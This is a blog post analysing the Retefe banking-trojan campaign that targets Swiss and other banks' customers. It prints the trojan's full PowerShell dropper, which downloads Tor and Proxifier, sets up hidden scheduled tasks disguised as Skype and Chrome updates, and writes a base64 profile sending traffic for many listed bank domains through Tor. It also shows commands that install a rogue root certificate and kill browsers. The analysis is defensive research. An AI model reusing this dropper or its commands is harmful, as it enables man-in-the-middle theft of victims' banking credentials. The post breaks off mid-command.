Monday, October 17, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)

A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JS embedded in the .docx file.  So in this post I'll explain a bit about it. Particularly, I'm interested in understanding how the Proxifier tool is setup with a custom profile to forward the traffic through Tor. This tool is something Cyber Criminals have introduced recently, as previously they used a proxy PAC file which is setup in the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL"

Last analysis about Retefe from Avast shows exactly the behaviour described above.

Retefe is not just affecting Swiss banks, but also other countries banks, like UK. So it might be that the custom proxy file is hardcoded into the malicious JS or dynamically this file is downloaded. So let's take a look to it.

(I have upload the malicious JS payload to VT )

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting thing I see are the Tor URLs defined bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion,




Also,  there is the fake Comodo CA which it used to avoid the browser SSL warnings. This is base64 encoded.




There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.










Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""

and some base64 encoded commands to kill the browser running:




"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe

"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe

So at this point the malicious certificate has been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain

Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff




This is the code



function Unzip
{
param([string]$zipfile, [string]$destination);
$7zaExe = Join-Path $env:Temp '7za.exe';
if (-NOT (Test-Path $7zaExe)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe);
}
Catch{}
}
if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
$ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
$td=$ts.NewTask();
$td.RegistrationInfo.Description = 'Does something';
$td.Settings.DisallowStartIfOnBatteries = $False;
$td.Settings.StopIfGoingOnBatteries = $False;
$td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
$LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
$LogonTrigger.StartBoundary=[System.DateTime]::Now;
$LogonTrigger.UserId=$env:username;
$LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
$td.Triggers.Add($LogonTrigger);
if($restart -eq 1){
$TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
$TimeTrigger.StartBoundary=[System.DateTime]::Now;
$TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
$TimeTrigger.Repetition.StopAtDurationEnd=$False;
$td.Triggers.Add($TimeTrigger);
}
$ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params);
$td.Actions.Add($ExecAction);
$task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
$task.Run();
}
function InstallTP{
$File=$env:Temp+'\ts.zip';
$Dest=$env:Temp+'\ts';
(New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File);
if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
Unzip $File $Dest;
rm -Force $File;
$TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll';
$loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
$TFile=$env:Temp+'\t.zip';
$DestTP=$env:APPDATA+'\TP';
(New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile);
if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
Unzip $TFile $DestTP;
rm -Force $TFile;
$tor=$DestTP+'\Tor\tor.exe';
$tor=$tor.Replace('\','/');
$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd;
$PFile=$env:Temp+'\p1.zip';
$wc=new-object net.webclient;
$purl='http://proxifier.com/distr/ProxifierPE.zip';
$wc.DownloadFile($purl,$PFile);
Unzip $PFile $DestTP;
$p_old=$DestTP+'\Proxifier PE\';
rm -Force $PFile;
Rename-Item -path $p_old -newName 'p';
$p_fold=$DestTP+'\p\';
$p=$DestTP+'\p\Proxifier.exe';
$settings_file=$p_fold+'Settings.ini';
Base64ToFile $settings_file 'W1NldHRpbmdzXQ0KRGVmYXVsdE5ldFByb2ZpbGU9MTcxMTg3Njg4NQ0KTG9nTGV2ZWxTY3JlZW49Mg0KTG9nTGV2ZWxGaWxlPTANCkxvZ1BhdGg9DQpTeXNUcmF5SWNvbj0xDQpTeXNUcmF5SWNvblNob3dUcmFmZmljPTANClNob3dUcmFmZmljVHlwZT0wDQpUcmFmZmljUmVmcmVzaFNwZWVkPTENCkFjdGl2ZVByb2ZpbGU9RGVmYXVsdA0KUHJvZmlsZUF1dG9VcGRhdGU9MA0KUHJvZmlsZVVwZGF0ZVVybD0NClByb2ZpbGVVcGRhdGVVcmxUb0ZvbGRlcj0xDQpQcm9maWxlVXBkYXRlS2VlcExvZ2lucz0wDQpVcGRhdGVDaGVjaz0wDQpbV29ya3NwYWNlXQ0KQXBwbGljYXRpb25Mb29rPTIxNA0KUnVsZURsZ1dpZHRoPTczMg0KUnVsZURsZ0hlaWdodD00MzYNCltEZWZhdWx0XENvbnRyb2xCYXJWZXJzaW9uXQ0KTWFqb3I9OQ0KTWlub3I9MA0KW0RlZmF1bHRcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1BQUFBQUFBQUFBQUENCltEZWZhdWx0XENvbW1hbmRNYW5hZ2VyXQ0KQ29tbWFuZHNXaXRob3V0SW1hZ2VzPUFBQUENCk1lbnVVc2VySW1hZ2VzPUFBQUENCltEZWZhdWx0XENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW0RlZmF1bHRcUGFuZS01OTM5M10NCklEPTANClJlY3RSZWNlbnRGbG9hdD1LQUFBQUFBQUtBQUFBQUFBT0dBQUFBQUFPR0FBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1BQUFBQUFBQUdKQkFBQUFBRUVEQUFBQUFKS0JBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9NDA5Ng0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW0RlZmF1bHRcQmFzZVBhbmUtNTkzOTNdDQpJc1Zpc2libGU9MQ0KW0RlZmF1bHRcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBQ0FCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLS0xXQ0KSXNWaXNpYmxlPTENCltEZWZhdWx0XFBhbmUtMzEwXQ0KSUQ9MzEwDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTgxOTINClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbRGVmYXVsdFxQYW5lLTEwMjJdDQpJRD0xMDIyDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTEwMjJdDQpJc1Zpc2libGU9MA0KW0RlZmF1bHRcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUlQQUFBQUFBSUtCQUFBQUFBTUJBQUFBQUFIQ0FBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQUlPQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbRGVmYXVsdFxCYXNlUGFuZS0xMDIzXQ0KSXNWaXNpYmxlPTANCltEZWZhdWx0XERvY2tpbmdNYW5hZ2VyLTEyOF0NCkRvY2tpbmdQYW5lQW5kUGFuZURpdmlkZXJzPUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUFBQUNBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQQUFBQUFBQUFDQUJBQUFBQUVFREFBQUFBR0FCQUFBQUFBQUFBQUFBQUJBQUFBQUFCRUFBQUFBQUFCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFQUFBQUFBQUERBQUFBQUFBR0RCQUFBQUFPUERBQUFBQVBQREFBQUFBUFBQUENBQUFMQUFBREVFRkJHQ0dDR0ZHRUdBRkJHT0dGR0FBQUNBQUFBQkFBQUFBQUFJUEFBQUFBQUlLQkFBQUFBQU1CQUFBQUFBSENBQUFBQUFBQUFBQUFBT0NBQUFBQUFFRURBQUFBQUNBQkFBQUFBQUFBQUFBQUFBRUVCQUFHRkRBQUFBQUFBUFBPUFBQTEFERUFBUEdBQU9HQUFPR0FBRkdBQURHQUFFSEFBSkdBQVBHQUFPR0FBREhBQUJBQUFBQUFBR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBQUE9QUFBIQUVGQUFDSEFBQkdBQUdHQUFHR0FBSkdBQURHQUFCQUFBQUFBQU9QREFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQS0FERkFBRUhBQUJHQUFFSEFBSkdBQURIQUFFSEFBSkdBQURHQUFESEFBQkFBQUFBQUFQUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KW1N0YXR1c10NCkZpcnN0UnVuPTANClN5c1RyeUljb25NZXNzYWdlU2hvd249MQ0KW1dvcmtzcGFjZVxDb250cm9sQmFyVmVyc2lvbl0NCk1ham9yPTkNCk1pbm9yPTANCltXb3Jrc3BhY2VcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1HRkFBQUFBQUVCQUFBRUJPQUFBQUJBQUFBQUFBTkFFQUFBQUFDQUFBQUFBQVBIQUlBQUFBQkFBQUFBQUFFQUJPQUFBQUJBQUFBQUFBT0JBSUFBQUFHQkFBQUFBQU9FQUlBQUFBREFBQUFBQUFQRkFJQUFBQUNBQUFBQUFBTEVBSUFBQUFCQUFBQUFBQU1BRUFBQUFBQkFBQUFBQUFPSEFJQUFBQUJBQUFBQUFBREFCT0FBQUFDQUFBQUFBQU5CQUlBQUFBQUJBQUFBQUFQREFJQUFBQUxBQUFBQUFBQUFFQUFBQUFDQUFBQUFBQUNDQk9BQUFBQ0FBQUFBQUFESUFJQUFBQURBQUFBQUFBTURBSUFBQUFFQUFBQUFBQUtFQUlBQUFBSUFBQUFBQUFNQkFJQUFBQUNBQUFBQUFBT0RBSUFBQUFCQUFBQUFBQQ0KW1dvcmtzcGFjZVxDb21tYW5kTWFuYWdlcl0NCkNvbW1hbmRzV2l0aG91dEltYWdlcz1BQUFBDQpNZW51VXNlckltYWdlcz1BQUFBDQpbV29ya3NwYWNlXENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW1dvcmtzcGFjZVxQYW5lLTU5MzkzXQ0KSUQ9MA0KUmVjdFJlY2VudEZsb2F0PUtBQUFBQUFBS0FBQUFBQUFPR0FBQUFBQU9HQUFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUFBQUFBQUFBR0pCQUFBQUFFRURBQUFBQUpLQkFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTU5MzkzXQ0KSXNWaXNpYmxlPTENCltXb3Jrc3BhY2VcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBSEJCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltXb3Jrc3BhY2VcQmFzZVBhbmUtLTFdDQpJc1Zpc2libGU9MQ0KW1dvcmtzcGFjZVxQYW5lLTMxMF0NCklEPTMxMA0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbV29ya3NwYWNlXFBhbmUtMTAyMl0NCklEPTEwMjINClJlY3RSZWNlbnRGbG9hdD1DQUJBQUFBQUlCQkFBQUFBS01CQUFBQUFBT0JBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1FQUFBQUFBQUdFQUFBQUFBQUVEQUFBQUFOUEFBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9ODE5Mg0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW1dvcmtzcGFjZVxCYXNlUGFuZS0xMDIyXQ0KSXNWaXNpYmxlPTANCltXb3Jrc3BhY2VcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTEwMjNdDQpJc1Zpc2libGU9MA0KW1dvcmtzcGFjZVxEb2NraW5nTWFuYWdlci0xMjhdDQpEb2NraW5nUGFuZUFuZFBhbmVEaXZpZGVycz1BQUFBQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFDQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBSEJCQUFBQUFFRURBQUFBQUxCQkFBQUFBQUFBQUFBQUFCQUFBQUFBQkVBQUFBQUFBQkFBQUFBQUFHSk9QUFBQUElGQUFBQUFBUFBQUFBQUFBEQUFBQUFBQUdEQkFBQUFBT1BEQUFBQUFQUERBQUFBQVBQUFBDQUFBTEFBQURFRUZCR0NHQ0dGR0VHQUZCR09HRkdBQUFDQUFBQUJBQUFBQUFBSVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUFBQUFBQUFBQU9DQUFBQUFBRUVEQUFBQUFIQkJBQUFBQUFBQUFBQUFBQUVFQkFBR0ZEQUFBQUFBQVBQT1BQUExBREVBQVBHQUFPR0FBT0dBQUZHQUFER0FBRUhBQUpHQUFQR0FBT0dBQURIQUFCQUFBQUFBQUdEQkFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQSEFFRkFBQ0hBQUJHQUFHR0FBR0dBQUpHQUFER0FBQkFBQUFBQUFPUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUFBQT1BQUEtBREZBQUVIQUFCR0FBRUhBQUpHQUFESEFBRUhBQUpHQUFER0FBREhBQUJBQUFBQUFBUFBEQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCltXb3Jrc3BhY2VcV2luZG93UGxhY2VtZW50XQ0KTWFpbldpbmRvd1JlY3Q9QVBBQUFBQUFLSUJBQUFBQUVFRUFBQUFBSkZEQUFBQUENCkZsYWdzPTANClNob3dDbWQ9MQ0KW0xpY2Vuc2VdDQpPd25lcj0yVENLWC1UWVFITC1ORk4zMy0zWUVEWS1RVzY1RA0KS2V5PTJUQ0tYLVRZUUhMLU5GTjMzLTNZRURZLVFXNjVEDQo=';
$p_prof=$p_fold+'Profiles\';
md $p_prof | Out-Null;
$def_file=$p_prof+'Default.ppx';
Base64ToFile $def_file 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4=';
AddTask 'ChromeUpdate' $p '' 1;
}
InstallTP


In the beginning, there is a function 'unzip' in charge of downloading an application from URL https://chocolatey.org/7za.exe to unzip compressed files.

Then, the function 'Base64ToFile' does a base64 decode of a string and stores the output in a file

But the key function, is the last one, InstallTP, which does several things:


  1. Pulls a file from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031 Which permits to run the malicious process automatically as a task
  2. Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
  3.  Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
  4. Configures the Settings.ini for the Proxyfier
  5. And finally, it is the interesting stuff, the Proxifier profile, where I can see all the banks for which the traffic is sent through Tor

echo "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2V